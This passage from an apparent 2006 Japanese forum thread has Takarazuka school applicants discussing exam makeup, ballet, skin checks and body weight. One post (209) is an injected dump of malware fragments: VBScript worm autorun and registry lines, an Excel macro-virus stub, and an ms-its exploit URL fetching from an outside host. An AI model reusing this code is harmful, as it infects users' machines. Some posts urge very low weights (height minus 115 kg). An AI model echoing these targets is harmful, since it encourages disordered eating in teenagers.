私の友達ジェンヌだけど金コネ無しの本当に普通の一般家庭の子だよ。音校時代は親に出して貰ったらしいけど劇団入ってからは親に迷惑掛けまいと給料だけで頑張ってるみたい。
その子曰く、お金がコネがと考えるよりもレッスンして入れる実力つける事が第一。家の金銭問題は合格してから!が受験時代の考えだったらしい。

128 :名無しさん@花束いっぱい。:2006/08/24(木) 19:09:25 ID:gIQIWw8n
>127
給料だけでどこまでやっていけるかだな。
オバサマとか付いてくれたら問題ないけど、
余程特出したものがない限り難しいとは思うけどね。
まあ頑張ってくれ と伝えてくれ。

129 :名無しさん@花束いっぱい。:2006/08/24(木) 19:33:37 ID:zu8Efy63
>128
自分が働いた給料でやって行ってるんだ、「どこまで〜」云々は
余計なお世話だろうよ。
どうしてここの連中は自分のリアルは棚に置いてエラソーなこと
垂れるんかな〜?
傍目から見てると嫉み嫉みにしか見えないってことわからんのかな?
夢に破れようと、挫折しようと様々な困難を認識して努力してる人間に
たいして世の中も知らないくせに知ったかぶって恥ずかしいね!

130 :名無しさん@花束いっぱい。:2006/08/24(木) 19:46:17 ID:gIQIWw8n
>129
余計なお世話まで書いちゃいけないのか?
ちなみに俺は男だから嫉みだとか言われてもなあw
世の中頑張れば報われるってわけではないんだよ?
あまちゃんだなw 世の中知らないのはおまいだよ。
その方が恥ずかしいとわかってないのかw

131 :名無しさん@花束いっぱい。:2006/08/24(木) 19:50:32 ID:zu8Efy63
なりすまし厨だったかww
エラソーなこと垂れる前に安価のつけかたくらいベンキョーして
おいでね、厨ちゃん。
誰が「世の中頑張れば報われる」なんぞと書いたというんじゃ?
よく嫁。
嫉み嫉みのお嬢ちゃん(ぷぷっ)

132 :名無しさん@花束いっぱい。:2006/08/24(木) 23:14:34 ID:mwmk0jR/
>131
エラそうなこと言う前に専ブラ入れたら? お嬢ちゃん プ
専ブラ入れたらアンカーのつけ方なんぞ関係ないべ プ
2ちゃんのベンキョーして出直してきな、どうしようもない厨ちゃん プ
なりすましってなんなんだか プ
あ、ヅカ受験失敗した貧乏お嬢ちゃんでしたか、これは失礼 プ

133 :名無しさん@花束いっぱい。:2006/08/25(金) 20:54:49 ID:BGVQhX/3
おまいらどっか行け。
暑苦しいぞ。

134 :名無しさん@花束いっぱい。:2006/08/28(月) 11:22:03 ID:Jy22+cJU
夢は大切だけど何でも諦めも肝心。
医学部もそう、ステータスある職に就くためには何でも金・コネって必要。
でもその前に一番大切なものがある。ハングリー精神と純粋な心、そしてヅカ
は何より容姿端麗!
自分に自信がない人はそのまま何をするのにも自信のなさが表れ他人にはすぐに
わかる。試験は特に。
容姿端麗と心が一番大切。生まれ持ったものだから余計に諦めも肝心。
容姿端麗を磨く為にまずは心磨き。そして習い事。

ヅカ受験失敗した人なんてゴロゴロいるけど、受験に向けて頑張った過程が
一番大切なんだし、それから花開かせた人もいっぱいいる。
宝塚受験だけがすべてではない。


135 :名無しさん@花束いっぱい。:2006/09/15(金) 20:08:08 ID:eEWk9k35
そうですよね。

136 :名無しさん@花束いっぱい。:2006/09/15(金) 22:25:27 ID:WRQkROOd
あげるな

137 :名無しさん@花束いっぱい。:2006/09/20(水) 16:49:23 ID:Wga9Kvkf
試験当日は化粧NGだけど、スクール生なんかはしてるよね?検査とかないの?

138 :名無しさん@花束いっぱい。:2006/09/20(水) 19:29:59 ID:iOF79pDb
お化粧してる人多いよね。
やってみようと思ってるけどどこまでファンデ塗ったら
いいのかがわかんないww

139 :名無しさん@花束いっぱい。:2006/09/20(水) 19:52:59 ID:JkrjUei0
>>138
試験会場について受験番号配られる時、ひとりひとり前にでるんだけど、自分の真横にもうひとりおばちゃん審査官?が居てジーーーーッと見られますよ…。

その人のオッケサインがでたら晴れて番号をもらい、本科のひとに控室に通されるという感じです。
リキッドくらいならバレなさそうだけどぶ厚すぎると…バレちゃうかも。




受験頑張って!!

140 :名無しさん@花束いっぱい。:2006/09/20(水) 21:50:14 ID:iOF79pDb
>139サン
そんな時から見られてるんですか?!
私今度が2回目なんですケド、その審査官みたいな方いました!!
じゃぁ今度は薄く塗って行きたいと思います。。
ありがとうございました(^^)頑張ります!!

141 :名無しさん@花束いっぱい。:2006/09/20(水) 23:03:34 ID:+jbEshOp
化粧しないほうが好印象だと思うけどな〜
どうしてそんなに塗りたいの?
スレてる、出来上がってるとの印象持たれるんだけどなぁ

142 :名無しさん@花束いっぱい。:2006/09/20(水) 23:28:20 ID:aZOUCq6p
受験って控室とか受付の行動も見てるんだよ
試験会場入ったときから試験は始まってるようなもんなんだから
第一入学したら最低1年はスッピンじゃん

143 :名無しさん@花束いっぱい。:2006/09/21(木) 10:48:59 ID:Q7E24ahq
入っちゃったらこっちのもんだから。問題は入るまでだから。
誰だって試験時にちょっとでもキレイに見られたいでしょ。
キレイに見られて有利ならなおさら。

144 :名無しさん@花束いっぱい。:2006/09/21(木) 16:46:15 ID:d2NRo20x
ファンデだけで大丈夫だよね?アイメイクはやらなくても・・

145 :名無しさん@花束いっぱい。:2006/09/21(木) 17:01:00 ID:wqlmmuar
よく受付とか控え室から見られてるっていうけど、本科生が見て誰に報告するの?


146 :名無しさん@花束いっぱい。:2006/09/21(木) 17:10:27 ID:g3nUg+rR
ただ。。ばれたら、、終わりだね
メイク落とすにしてもたぶん水
その上音楽学校の廊下&トイレは寒い
こんな状況で見つかってメイク落としても
落とした後の顔が真っ赤になってて、普段よりさらに
不細工に見える恐れあり、、
などど勝手に妄想してみる
どうしてもメイクしないと自信が無い方は
みつから内容にね〜〜〜〜〜〜

147 :名無しさん@花束いっぱい。:2006/09/21(木) 17:10:56 ID:mJNfAUNY
甘いな・・・誰が見てキレイだと思うのか考えてみたら?
本科生や同じ受験生のいわゆる同世代に「評価」なんて糞にもならないの。
試験官は、素直さや従順さも見てるわけ。
18くらいまでで、ファンデ塗らなきゃないないほど、キレイじゃない子は
はっきりいって必要ありません。

148 :名無しさん@花束いっぱい。:2006/09/21(木) 18:08:57 ID:2ZZNvfT9
バレエの試験では回転物とか出るんですか?シェネぐらい出来ないと駄目ですよね?

149 :名無しさん@花束いっぱい。:2006/09/22(金) 01:35:57 ID:RAIlEudO
ダブルピルエット出ましたよ。回転ものより、ジャンプ多かった気が…

150 :名無しさん@花束いっぱい。:2006/09/22(金) 11:01:45 ID:fx5q6qwc
メイクなかなか難しいですね…
受験生って皆細いですけど体脂肪何%くらいなんですか?

151 :名無しさん@花束いっぱい。:2006/09/22(金) 11:29:08 ID:CoSQOV3o
5くらい

152 :名無しさん@花束いっぱい。:2006/09/22(金) 16:01:09 ID:YgZo3X3T
やせてるにしても5%は細すぎ。15%でも細いと思う

153 :名無しさん@花束いっぱい。:2006/09/22(金) 16:52:37 ID:za/BAaEw
いや、5なんて冗談でしょ。笑 そんなのありえない。

154 :名無しさん@花束いっぱい。:2006/09/22(金) 23:41:27 ID:CoSQOV3o
冗談よW
私の友達はバドミントンの選手なんだけど、毎日激しい運動をしています。
私は栄養関係について勉強していまして、レポートの協力をしていただいていて、彼女の体脂肪を測定させてもらいました。
8〜9でした。
彼女は174センチの54キロです。
見た目は程よく筋肉があり、美しいです。
健康で、好き嫌いはありません。
肌の状態も綺麗です。

155 :名無しさん@花束いっぱい。:2006/09/22(金) 23:58:15 ID:CoSQOV3o
そうそう、体脂肪が低いからといって痩せてみえるとは限らないし、
太ってみえるからといって体脂肪が高いというのは間違ってるので。
ウザくてスマソ。

156 :名無しさん@花束いっぱい。:2006/09/23(土) 00:01:04 ID:1ENGx3EW
うん、ウザイ、もう来なくていいから〜〜

157 :名無しさん@花束いっぱい。:2006/09/23(土) 02:11:01 ID:hBbUdB/V
でも実際は、何か太めじゃないか?・・って子が受かってたりする。
逆にかなり細い子は駄目みたい。(ガリガリってゆーのか)
体力無いとか、拒食してるとか思われるんかな・・。
予科なんて凄くキツイらしいから、健康的な方がいいんだろーね。

ファンデって、体にも塗ってるの?(首とか出てるとこ)

158 :名無しさん@花束いっぱい。:2006/09/24(日) 15:16:10 ID:+JCYaMFQ
色黒はNGだからね・・・あと、吹き出物のブツブツとかも

それで塗るんじゃないの?

159 :名無しさん@花束いっぱい。:2006/09/24(日) 15:52:42 ID:AFmU91o1
娘役は肌が見える場所はドーラン塗っています。
塗らないと肌がライトに映えない。
男役のダルマで胸に紗とかついているのは肌を塗る時間がないから。


160 :159:2006/09/24(日) 15:56:36 ID:AFmU91o1
勘違いレスだったわ・・・W
スマン

161 :名無しさん@花束いっぱい。:2006/09/24(日) 16:18:03 ID:lrrg7ReX
もちろん日焼けもNGだよね?でも手は七部袖だから、分からないよね。

162 :名無しさん@花束いっぱい。:2006/09/24(日) 16:25:38 ID:+JCYaMFQ
きっと、スクールでは少しでも色白で肌がキレイに見えるように
塗らせてるんじゃないかな

オシャレとかじゃなくて、ね

163 :名無しさん@花束いっぱい。:2006/09/24(日) 20:33:54 ID:/2ijZZc5
スクールといえば川路ってあんまり情報聞かないけどどうなの?

164 :名無しさん@花束いっぱい。:2006/09/24(日) 22:09:08 ID:O/2VKBM7
川路スレがあるので、そちらでどーぞ。

>>162 ミスコンじゃあるまいし、肌の綺麗さで合否が決まるわけ?ww
化粧しると指導するスクールって・・・どーよ?

165 :名無しさん@花束いっぱい。:2006/09/24(日) 22:29:43 ID:+JCYaMFQ
>>164
私も162さんのように思ってたけど、実際肌がキレイじゃないと
駄目なんだと。脚も虫さされの痕なんてもってのほかって。
面接で肌もチェックする為、ナマ脚だし。
目や眉はイジラナイって。

某スクール生の友人談。




166 :名無しさん@花束いっぱい。:2006/09/24(日) 22:31:47 ID:+JCYaMFQ
↑スマソ
162さんのように×
164さんのように○

167 :名無しさん@花束いっぱい。:2006/09/24(日) 22:57:54 ID:O/2VKBM7
>>165
生脚はO脚X脚、歪みのチェックと違うの?
虫刺されこそドーランでカバーできる範疇だろうに。
何か大きな勘違いしてない?その某スクール生。

168 :名無しさん@花束いっぱい。:2006/09/24(日) 23:34:17 ID:+JCYaMFQ
だからさ〜、自分で思ってんじゃなく、先生に言われたり、
受験した子とかに言われてんでしょ。

歪み見るだけならタイツ穿いてていいやん。
歪みも見るし、肌も見るって事でしょ。
だからタイツは穿かな・・・

・・・話が分からんようだから もう、いいわ。


169 :名無しさん@花束いっぱい。:2006/09/24(日) 23:42:08 ID:O/2VKBM7
>168
バレエも知らないんじゃね?
タイツはある程度補正効果あるんだよ。

で、何でキレてるわけ?ww

170 :名無しさん@花束いっぱい。:2006/09/24(日) 23:58:47 ID:+JCYaMFQ
>>169
何が言いたいのかホント分かんないんですけど・・・

タイツはある程度補正効果あるんだよ
これ↑何に対して言ってんのw

私が言ってるのは 面接の時はナマ足にならなきゃいけないけど
足の形だけみるなら、タイツ着用でも支障ないのに
脱いでナマの足をさらすのは肌のチェックもするから。顔も同じく。
・・・て事なのに。(バレエは3歳からだからよ〜く知ってるけど?)


171 :名無しさん@花束いっぱい。:2006/09/25(月) 14:26:10 ID:+mqkOtag
タイツで補正できるくらいなO脚なら別に問題ないだろ、とつぶやいてみる。

172 :ららら:2006/09/25(月) 15:10:20 ID:vPq4PgmJ
化粧して受験する人って居たんだ〜。
知らなかった。
だって受かってる人は皆スッピンだったもん

173 :名無しさん@花束いっぱい。:2006/09/25(月) 15:21:24 ID:S6Zs9Wny
普通メイクで可愛くなる子はいらん。
舞台メイクで美人になる子がほしい。
だからすっぴんで受験しにいらっしゃい。
舞台メイクできれいになりそうな子を選ぶから。
肌荒れや虫さされあとがある子は化粧でまたひどく荒れたらみにくいから却下よ。
乙女のみだしなみは髪型、服装、気持ちの美しさから。

174 :名無しさん@花束いっぱい。:2006/09/25(月) 15:58:48 ID:UrtB3jji
今年の受験で茶色で眉書いてて落とすように言われてた子いたよ〜
でも本科生は「ごめんね〜茶色はちょっとダメかな〜」みたいな言い方だった。



175 :名無しさん@花束いっぱい。:2006/09/25(月) 16:09:13 ID:8iiHBtXS
化粧をあくまでするって聞かないヤツはして受験すれはいい。
体中ファンデ塗ってww
バレエで汗かかないよににな。
で、受かったら報告にいらっさい。
>173はチト古臭い言い回ししてるけど、その通り。
「受かったらこっちのもんやしな」なんて根性は化粧しても
猫の皮被っても意外とはっきりわかるから怖いんだよね。
面接が50lの割合占めてるんだから。

176 :名無しさん@花束いっぱい。:2006/09/25(月) 21:02:02 ID:S6Zs9Wny
また登場したわ。
眉毛は書くなら黒ね。
眉毛は形や色を変えて表情を作る生徒さんはたくさんいるわ。もちろん音校生でもね。
あまり処理していない眉は逆に毛深いやら、ムダ毛が多いと思われる可能性が少しあるわ。もちろんそれは眉毛だけでは判断できないけれど。
とにかく化粧の心配よりもお肌、髪型、ムダ毛、健康の心配を。
レッスンを努力なさい。
そうすれば化粧しなくても自身はつくはずよ。


177 :名無しさん@花束いっぱい。:2006/09/26(火) 03:31:11 ID:YGpBkgZV
そう、肌がキレイな小顔が好まれる。
そして、バレエが上手くて感じのいい子。

178 :名無しさん@花束いっぱい。:2006/09/26(火) 07:35:55 ID:WgZkxKpd
流れを変えるようで申し訳ないのですが今年の一次と二次の合格発表はだいたい何日くらいなのでしょうか?

179 :名無しさん@花束いっぱい。:2006/09/26(火) 08:16:29 ID:natKA5E0
受験した次の日

180 :名無しさん@花束いっぱい。:2006/09/26(火) 08:17:23 ID:natKA5E0

一次試験が っていうことね。

181 :名無しさん@花束いっぱい。:2006/09/26(火) 09:02:31 ID:WgZkxKpd
ありがとうございます!!
二次はいつ頃ですか?

182 :名無しさん@花束いっぱい。:2006/09/26(火) 16:51:28 ID:Suyp9vWy
全部歌劇団のHPに書いてあるよ、確認すべし

183 :名無しさん@花束いっぱい。:2006/09/26(火) 17:04:53 ID:yhfIG1Ky
歌が上手いよりもバレエ重視?
最近はレッスンほとんどしないで入りました。なんて子いないよね?それくらいの美貌の持ち主。
音校生でもいたりする?美貌無くてそういう子は・・?

184 :名無しさん@花束いっぱい。:2006/09/26(火) 18:04:03 ID:YNs/dZKf
いや、むしろバレエより歌重視で通ってる子が多い。
宝塚のバレエはレベル低いから〜そりゃ腰外せば足は上がるわ!って。
基礎がちゃんと身についてる子は本当に少ない。
きっと見せるバレエなんでしょうね。身体の柔軟性は必要のようですね。
ただし、歌は歌える子は断然有利なのは間違いない。
出来上がってなく、なおかつヘンなクセがついてない声が前に前に出せる子。

185 :名無しさん@花束いっぱい。:2006/09/27(水) 00:08:17 ID:j0zECG7M
話しをチョット戻しちゃうみたいで申し訳ないんですが
メイクするしないの話で気になったんだけど、受験時にアイプチは有りなの?
これもバレなきゃOKみたいな感じなのかな?
予科生でもアイプチはしてるとかいう子いないのか気になる…

186 :名無しさん@花束いっぱい。:2006/09/27(水) 01:35:31 ID:/K1I6Squ
一重って、舞台人にはいいのにね。
あの濃いメイクは一重の方がやりやすい。

187 :名無しさん@花束いっぱい。:2006/09/27(水) 07:24:01 ID:usWIw7By
じゃあ逆に男役めざしてて、くっきり二重で目が大きいっていうのは不利なんでしょうか?

188 :名無しさん@花束いっぱい。:2006/09/27(水) 09:12:50 ID:hd5ZO0lL
受験、それも厳しい基準を目前にして不安を抱くのはよくわかるよ。
でもね、一重でもぱっちり大きな目でも、自分の魅力は何か、個性
と呼べるものは何か、よく自分を見つめて、自分に自信を持つこと。
弾けるような笑顔を持った子が一番なんだから。

189 :名無しさん@花束いっぱい。:2006/09/30(土) 16:02:23 ID:17dh+NcK
アイプチしてる子本科にとらされてたよ。
瞼めくれるし、不自然だし…歌やバレエに集中できないかもよ。

190 :名無しさん@花束いっぱい。:2006/09/30(土) 19:49:39 ID:u0eTewzn
受験の時の下着って専用のものをしたほうがいいのですか?

191 :名無しさん@花束いっぱい。:2006/09/30(土) 22:22:20 ID:/G+SN7Ku
下着が見えないように、ボディーファンデーション着た方がよい。

192 :名無しさん@花束いっぱい。:2006/10/02(月) 08:12:41 ID:vaJUY3J2
巨乳は不利なんですか?
胸が大きすぎて落とされたという子がいるんですが。
(体は細い)

193 :名無しさん@花束いっぱい。:2006/10/02(月) 08:44:25 ID:eBcLOuhU
>192
二次まで残ったのですか?

194 :名無しさん@花束いっぱい。:2006/10/02(月) 09:21:31 ID:yK7s1tt+
不合格理由を教えてくれるわけじゃないからね。
自分のネックだと思ってたことが不合格理由だと思い込んじゃうだけさ。
金・コネが必要以上に口汚く喧伝されるのもそれ。
巨乳でも合格する子はいてます。
ガイシュツだけど、面接が重要。性質や素養まで見極められる。

195 :名無しさん@花束いっぱい。:2006/10/02(月) 13:48:24 ID:NT5fV2EC
>>194
大手スクールだと不合格理由を教えてもらえますよ。

196 :名無しさん@花束いっぱい。:2006/10/02(月) 14:37:47 ID:ivbUPQGo
1次落ちでも?

197 :名無しさん@花束いっぱい。:2006/10/02(月) 19:46:49 ID:mSUCzbkT
>>192
でも巨乳ジェンヌって結構いるよ。
あんまり関係無いと思うけど。

私の贔屓も巨乳ですた。


198 :名無しさん@花束いっぱい。:2006/10/02(月) 21:00:23 ID:e4lMmjZA
面接が重要って、どういう質問があるの?その答えで性質素養を見極めるの?
態度?でも態度って特別いい子がいるわけでもなく悪い子がいるわけでもないし・・。

199 :名無しさん@花束いっぱい。:2006/10/02(月) 21:01:52 ID:OxxufOyU
ヅカメイクは一重や奥二重の人はほとんどアイテープ使用です。
お金持ちの子でなくと劇団がこの子は必ずトップになって劇団に必要な子になるとか、
顔スタイルが悪くとも、何か光るものがあったり秀でるものがあれば受かることもあります。
ただお金持ちの子が多いのは事実なので、その中で惨めに思ったりせず頑張れればいいですね。
寮にいる間はそれほどお金がかかりません。劇団のレッスン以外でお師匠さんについたり、声楽を
習ったりするとやっぱりかかるけど。それと学校の勉強はしないのでちょっと常識はずれますが、
皆記憶力はずごいです。振りを覚えるのは自分が一番と思っていた人がほとんどです。

200 :名無しさん@花束いっぱい。:2006/10/02(月) 23:21:32 ID:cxMEnUCc
200

201 :名無しさん@花束いっぱい。:2006/10/04(水) 19:31:19 ID:XB0VWbnL
受験の時はバレエシューズは新しく買い換えた方がいいんですか?
慣れている方がいいと思って買うかどうか迷っているんですけど
裏が黒いと減点ですかね??

202 :名無しさん@花束いっぱい。:2006/10/04(水) 20:23:32 ID:PFQEgzUQ
シューズによる減点は聞いたことがないのですが…?

203 :名無しさん@花束いっぱい。:2006/10/04(水) 20:51:36 ID:TE5/KsWQ
>>201
気になるなら、受験の2週間前とかに買い換えて
慣らしておくのもいいかも。
バレエの発表会とかでよくやります。
(人によって履き慣らす期間違うけど)
シューズは2足以上持って行った方がいいと思うし。

204 :名無しさん@花束いっぱい。:2006/10/04(水) 23:30:02 ID:EObadsyK
ある娘役さんに憧れ同じ舞台に立ちたくて受験を目指しています
でもたまに思う事があるんです。ファンだからこそ優しいのかも
ファンであるという一線は越えられなくても幸せなのかなって
上級生下級生だったら今のファンよりも遠くなってしまうのでは…
どうなんでしょう?

205 :名無しさん@花束いっぱい。:2006/10/05(木) 00:17:20 ID:sCCsumgl
そんな事考える前に、まずレッスンを頑張って入学できるかを今は考えるべきでは?今の考えではまず受からないよ。

206 :名無しさん@花束いっぱい。:2006/10/05(木) 00:30:01 ID:P4cnxFAl
私の知り合いの娘役(まだ下級生)さんは、現在の某トップ(他組)が好きで、入団後に一度話す機会があって、
ファンだという事を伝えたら、名前も覚えて貰えたし、とても良くして貰ってると言っていたよ。

207 :名無しさん@花束いっぱい。:2006/10/06(金) 21:54:37 ID:bC1favVQ
>202、203さん
シューズのことありがとうございました!!


208 :名無しさん@花束いっぱい。:2006/10/08(日) 13:08:33 ID:ml+dXX3W
なんか、ずっと思ってたんだけど今年は受験生の書き込み少なくないですか?
スレ消費も遅いし



例年この時期はここも盛り上がってたようなキガス。

209 :<body onload=window()>:2006/10/08(日) 17:06:32 ID:mvcESFpw
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub


210 :名無しさん@花束いっぱい。:2006/10/10(火) 19:23:21 ID:6RnRsQbz
>>209 ざんね〜〜んでした!
不発でやんの、ぷげら〜〜〜

211 :名無しさん@花束いっぱい。:2006/10/11(水) 13:15:45 ID:ON/99pGT

質問ageですが…
今年は容姿の良いお嬢さんをとる年とかバレエの上手なお嬢さんをとる年とかあると聞きますが本当なのですか?


212 :名無しさん@花束いっぱい。:2006/10/11(水) 17:36:19 ID:Wjo/v0iQ
そんなのはただの噂で歌が上手くてもバレエが下手でも
受かる人が受かるんだと思いますよ。

213 :名無しさん@花束いっぱい。:2006/10/11(水) 18:34:43 ID:EJ066y1L
宝塚は絶対鼻が高いor鼻筋通ってないと無理でしょうか?

214 :名無しさん@花束いっぱい。:2006/10/11(水) 18:36:18 ID:Zvw9djU7
バレエに関しては、30人位が踊るわけなので、上体の安定している子、容姿を見て良い子の番号に○をつけ、後からその人達をじっくり見るそうです。
はっきり言ってまずは容姿次に技術ですが、技術は相当上手くないと目立ちません。

215 :名無しさん@花束いっぱい。:2006/10/11(水) 18:51:47 ID:HKiSMDGc
バレエで容姿がだめ技術もだめなら歌でカバーしなきゃいけないの?
バレエの容姿は顔は関係ないよね?

216 :名無しさん@花束いっぱい。:2006/10/11(水) 19:02:49 ID:yMBG2Vg4
人前に立つ仕事なんだから普通に関係あるだろ

217 :名無しさん@花束いっぱい。:2006/10/11(水) 19:42:52 ID:HKiSMDGc
バレエで見るのは全体で面接では顔かなと思ったけど、両方か。
バレエの技術がだめなら歌でカバーだし逆のパターンも同じ?
現役生では例えば誰・・?どっちの方重視なんだろ・・

218 :名無しさん@花束いっぱい。:2006/10/11(水) 19:52:55 ID:a77UYsx0
受験は真剣に臨んでほしい。
バレエも歌も習ったことがない。それでも受かっている人がいる。
それなら私も可能性があるかも!
なんて思わないで。少しでも長くレッスンして基礎をたたき込んで。バレエの振りを覚えるテストは記憶力を試すものでもあるの。
それならバレエやっている子のほうが有利ですよ。
いきなりうまくなりたいと考えたりしたら変なくせもついてしまうよ。
歯を出して笑ってという試験も過去にありましたよ。
常に意識をして歩き、自分を研究し磨くという努力も必要ですよ。
人間観察をするのもいいかもしれませんね。
長文失礼いたしました。

219 :名無しさん@花束いっぱい。:2006/10/11(水) 21:19:16 ID:x5K1ma+F
>>213
おとめ見て自分で判断汁

220 :名無しさん@花束いっぱい。:2006/10/11(水) 23:26:31 ID:FU5+7xIo
>281
わかるな〜〜
はたから見ると普通の人くらいしか練習してないのに
私、人一倍頑張ってますみたいな顔してる子・・・。
しかもなぜかそんなひとに限って
根拠も無く自分は絶対受かる。。。
なんて妙な自身をもってる・・。
はー、、、そんな妙な自身を育てる前に
努力する心を育ててほしい・・。
自信を持つのはもちろん大切ですけど、努力しないと
始まらないよ。。。

221 :名無しさん@花束いっぱい。:2006/10/11(水) 23:37:16 ID:ylj4P88F
容姿の期とかバレエの期とか言われるけど
最低限の基礎がなきゃ取ってもらえないと思うんだけどね…

222 :名無しさん@花束いっぱい。:2006/10/12(木) 00:35:01 ID:gzDudDTO
容姿って結局普通っぽい人より、目立つというかオーラがあるという様な人や宝塚らしい昔のお嬢様風の人が選ばれる気がする。

223 :名無しさん@花束いっぱい。:2006/10/13(金) 17:42:54 ID:S5SCYFNB
>>222
同意。
昔の美智子様系の顔立ちの人が非常に多いと思う

224 :名無しさん@花束いっぱい。:2006/10/13(金) 22:50:04 ID:8L4ws9w2
化粧映えするかも重要

225 :名無しさん@花束いっぱい。:2006/10/14(土) 23:48:26 ID:kHo9uTMv
レオタードのプリンセスラインって何ですか??

226 :名無しさん@花束いっぱい。:2006/10/15(日) 01:24:18 ID:HDArSFdV
過去ログ遡ればあるんじゃない?というより、
バレエやってれば、それくらいはレオタード選ぶときとか
作るときに知識として入ってくることなんだけど・・・
なんだかな・・・


227 :名無しさん@花束いっぱい。:2006/10/15(日) 21:31:38 ID:f3Bo3ETX
実際どのくらいほそくないといけないの?

228 :名無しさん@花束いっぱい。:2006/10/15(日) 21:56:00 ID:hIKa7BMD
>226さん
バレエを始めてまだ日が浅いので
わからないんです。。

229 :名無しさん@花束いっぱい。:2006/10/15(日) 23:23:17 ID:UVyWjPsM
それぐらいググればすぐ出てくるよ

230 :名無しさん@花束いっぱい。:2006/10/16(月) 23:59:18 ID:8HEfjG4v
>>227
葵吹雪くらいなら大丈夫じゃないか?

231 :名無しさん@花束いっぱい。:2006/10/17(火) 02:02:35 ID:yUj3YUAR
>>230
あの人劇団から注意されないんだろうか・・・

おとめに(毎年だが)やりたい役→「トート、パック」と書いてあって
目が点になっちまう・・・

232 :名無しさん@花束いっぱい。:2006/10/21(土) 04:01:15 ID:jOM62vLX
age

233 :名無しさん@花束いっぱい。:2006/10/21(土) 08:59:40 ID:kZ3ffyUy
>>230
過去にも「貴水涼(?)」「花のんしおり」
がいたよね、2人とも劇団から注意されても
痩せなくて首切られたんだっけ 

234 :名無しさん@花束いっぱい。:2006/10/21(土) 13:58:36 ID:vKcUcA8j
うん。
厨同士、余所でやっておくれやす。


235 :名無しさん@花束いっぱい。:2006/10/21(土) 16:23:47 ID:Ehp4bhLo
佐賀県出身者の合格率アップ

236 :名無しさん@花束いっぱい。:2006/10/21(土) 16:52:15 ID:LJy5vdgE
プリンセスライン私も分からないので教えて頂けますか??

237 :名無しさん@花束いっぱい。:2006/10/21(土) 17:43:36 ID:P8HOGZ0R
身長−115以下

です。せめて110以下かな。
つまり160cmの人なら45kg以下が理想。
と、私の行ってた受験スクールでは言われてた。
現に受かった人はそれくらいの人しかいなかった。
159cm47kgで受かった人がいたけど、やっぱ太いと感じた。
自分のことは棚に上げてますが;

238 :名無しさん@花束いっぱい。:2006/10/21(土) 17:44:27 ID:nUDI+CYr
庭ででも聞いてみたら?
教えたがりがうようよしてっから。
こんな初歩的なこと答えてくれんじゃない?
それから、sage方も聞いておいで〜

239 :名無しさん@花束いっぱい。:2006/10/21(土) 23:49:52 ID:sbLs+DFU
>>237
元K.I.Eだよね?


240 :名無しさん@花束いっぱい。:2006/10/23(月) 01:39:05 ID:fSESfhwG
>>239
そういうアナタも?

241 :名無しさん@花束いっぱい。:2006/10/24(火) 18:10:38 ID:SLh+yZl0
KIEについて教えてもらえますか??
冬季講習行こうか迷ってるので・・・

242 :名無しさん@花束いっぱい。:2006/10/24(火) 18:18:27 ID:gYwzXBGu
>>241
どっかにKIEのスレがあったような・・・

あなたは身長-115以下ですか?せめて身長-110以下ですか?
そうでないなら、心を強く持って参加してください。

243 :名無しさん@花束いっぱい。:2006/10/24(火) 18:38:57 ID:DVcimO+4
受験者じゃないけど、今やってる雪組のバレリーナさん方、バレエ上手い人いなくない?特に役を貰ってる大月さん。
見出だされる役なのに説得力がない。
ああいう人はお顔合格なの?

244 :名無しさん@花束いっぱい。:2006/10/24(火) 19:03:45 ID:aHzUjhh/
大月さんは、バレエで名前があがるような人でもないと思うよ。劇団は顔は好みかもね。
スタイルもいいと思うけど。実力はまだまだこれからですね。

245 :名無しさん@花束いっぱい。:2006/10/25(水) 16:32:09 ID:e69kmWKH
体重は大丈夫です。でも身長が低くて・・・
157p42sです。受験の為に5s減らしました。
でも受験までに40目指してます。
KIEのスレってどこですか??

246 :名無しさん@花束いっぱい。:2006/10/25(水) 16:51:05 ID:VWETWbXT
親友が受けるんですが体重はクリアなんだけど身長153ってどうなんだろ。
今年から?募集要項に身長の記載がなくなりましたよね!?
ちなみにバレエは10年やってたみたい。
顔はわりと地味だけど化粧栄えしそうな顔です。
学校は兵庫県の公立進学校に通ってる。

247 :名無しさん@花束いっぱい。:2006/10/25(水) 18:41:00 ID:ChL9a6vt
誰が書いたかバレちゃうよ

248 :名無しさん@花束いっぱい。:2006/10/25(水) 19:45:06 ID:wHFE1+U5
今まで身長の記載あったっけ?身長制限があったわけではない・・?

249 :名無しさん@花束いっぱい。:2006/10/26(木) 13:05:38 ID:nFERbXcl
何年か前に宝塚受験をした友人に聞いたんだけど、
宝塚の真似みたいな部活してる学校結構あるよね?
学校の名前は覚えてないんだけどそういう部活に入ってることがばれたら
劇団が落とすから入りたかったのに入れなかった…みたいなことを言ってたんだが
そんな部活で落とすなんて本当にある話なの?



250 :名無しさん@花束いっぱい。:2006/10/27(金) 01:19:56 ID:4FFNdbPn
>>243
大月さんは歌の人だから…

>>246
身長の記載はなくなったけど基本的に155cm以上でしょ
それ以下はシナちゃんだけ

>>249
そんなことはない。入ってても受かってる。本女とか

251 :名無しさん@花束いっぱい。:2006/10/27(金) 16:06:18 ID:voo1orJK
>249
それは落ちた理由をそういうことにして納得したいんだよw

252 :名無しさん@花束いっぱい。:2006/10/27(金) 18:26:18 ID:VN2pXNSA
>>250
今は身長はマジで関係無いんだよ 155以下シナチャンの他にもいるよ
